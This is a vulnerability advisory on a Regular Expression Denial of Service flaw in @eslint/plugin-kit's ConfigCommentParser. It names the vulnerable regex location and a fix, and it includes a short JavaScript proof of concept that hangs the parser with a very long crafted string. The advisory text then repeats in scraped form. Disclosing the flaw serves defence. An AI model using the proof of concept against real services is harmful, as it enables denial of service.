Summary
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
Details
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
PoC
const { ConfigCommentParser } = require("@eslint/plugin-kit");
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end")
// run `npm i @eslint/[email protected]` and `node attack.js`
// then the program will stuck forever with high CPU usageImpact
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.
ericcornelissen Reporter
Summary
The
ConfigCommentParser#parseJSONLikeConfigAPI is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.Details
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with
[^-a-zA-Z0-9/].PoC
Impact
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.